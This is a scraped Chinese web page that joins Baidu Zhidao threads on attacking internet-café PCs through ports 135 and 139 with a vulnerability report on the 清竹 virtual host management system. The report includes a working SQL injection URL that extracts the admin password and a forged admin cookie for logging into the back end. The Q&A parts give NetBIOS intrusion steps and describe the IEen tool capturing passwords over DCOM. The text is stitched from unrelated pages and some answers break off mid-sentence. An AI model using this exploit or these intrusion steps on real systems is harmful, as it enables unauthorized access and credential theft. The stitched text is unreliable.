网吧利用135 139这两个端口怎么入侵和防御_百度知道
网吧利用135 139这两个端口怎么入侵和防御
网吧利用135 139这两个端口怎么入侵！！万象系统的！
我有更好的答案
在Windows构建的网络系统中，对每一台主机的唯一标识信息是它的NetBIOS名。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，从而实现信息通讯。在这样的网络系统内部，利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上,它就和一个后门程序差不多了。 看下网上流传很久用的139端口的进攻主法，这个方法实用性太小，几乎不太可能成功。用这个方法前，你要保证你机器里的有关tcp/ip和netbios协议要装齐。第一步假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的情况！如下图：上图中的202.98.84.90就是我的IP地址，这个主机的名字是21，工作组是YB第二步我们要做的是与对方计算机进行共享资源的连接在这里我们需要用到两...
下载个局域网工具就行了
其他类似问题
为您推荐：
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁清竹虚拟主机管理系统sql注入漏洞与后台构造cookie登录
&简要描述：
清竹虚拟主机管理系统漏洞
详细说明：
清竹虚拟主机管理系统漏洞
NCompany\Index.asp
loadfile_fromcache templatePath&&NCompany-Index.html& & & & '加载index.html模板
TempCon=TempCon&Application(&Qz_TP_&&templatePath&&NCompany-Index.html&)
Id=ReStrs(Request.QueryString(&Id&))//过滤不严格
Set rs=Conn.Execute(&Select * From [Qz_NComPany] Where [Id]=&&Id)//直接带入sql语句
Address=rs(&Address&)
TelInfo=rs(&TelInfo&)
exp:ncompany/index.asp?id=1%09union%09%se%lect%091,2,3,4,5,adminpass,7,8,9,10,11%09from%09adminuser%09where%09id=1
构造cookie:
AdminUser = 注入得来的adminuser
PassWord = 注入得来的adminpass
AdminExu = system.asp, jihua.asp, news_admin.asp, mailtemplate.asp, ads.asp, success.asp, ServerQQ.asp, member.asp, message.asp, agent_fenlei.asp, grade.asp, sendmail.asp, proclass.asp, domain.asp, domainbuy.asp, domainupdate.asp, hostlist.asp, hostbuy.asp, vpath.asp, bindcheck.asp, cert.asp, sqllist.asp, sqlbuy.asp, my_sqllist.asp, my_sqlbuy.asp, maillist.asp, mailbuy.asp, apppool.asp, scriptmaps.asp, serverlist.asp, apppoolmode.asp, serverdomain.asp, shopitem.asp, shoplist.asp, shopbuy.asp, money.asp, moneylog.asp, pay.asp, payonline.asp, domain_api.asp, password.asp, template.asp, links.asp
漏洞证明：
【声明】:黑吧安全网()登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱，我们会在最短的时间内进行处理。
上一篇：【】【】简述135端口漏洞_百度知道
简述135端口漏洞
以前只记得可以利用135端口释放类似灰鸽子之类的东西,很久没用了,现在这个端口还可以用吗?
在许多“网管”眼里，135端口是最让人捉摸不透的端口，因为他们中的大多数都无法明确地了解到135端口的真正作用，也不清楚该端口到底会有哪些潜在的危险。直到一种名为“IEen”的专业远程控制工具出现，人们才清楚135端口究竟会有什么样的潜在安全威胁。 IEen工具能够借助135端口轻松连接到Internet上的其他工作站，并远程控制该工作站的IE浏览器。例如，在浏览器中执行的任何操作，包括浏览页面内容、输入帐号密码、输入搜索关键字等，都会被IEen工具监控到。甚至在网上银行中输入的各种密码信息，都能被IEen工具清楚地获得。除了可以对远程工作站上的IE浏览器进行操作、控制外，IEen工具通过135端口几乎可以对所有的借助DCOM开发技术设计出来的应用程序进行远程控制，例如IEen工具也能轻松进入到正在运行Excel的计算机中，直接对Excel进行各种编辑操作。 怎么样？135端口对外开放是不是很危险呀？当然，这种危险毕竟是理论上的，要想真正地通过135端口入侵其他系统，还必须提前知道对方计算机的IP地址、系统登录名和密码等。只要你严格保密好这些信息，你的计算机被IEen工具攻击的可能性几乎不存在。 为什么IEen工具能利用135端口攻击其他计算机呢？原来该工具采用了一种DCOM技术，可以直接对其他工作站的DCOM程序进行远程控制。DCOM技术与对方计算机进行通信时，会自动调用目标主机中的RPC服务，而RPC服务将自动询问目标主机中的135端口，当前有哪些端口可以被用来通信。如此一来，目标主机就会提供一个可用的服务端口作为数据传输通道使用。在这一通信过程中，135端口的作用其实就是为RPC通信提供一种服务端口的映射功能。说简单一点，135端口就是RPC通信中的桥梁。
其他类似问题
为您推荐：
135端口的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁}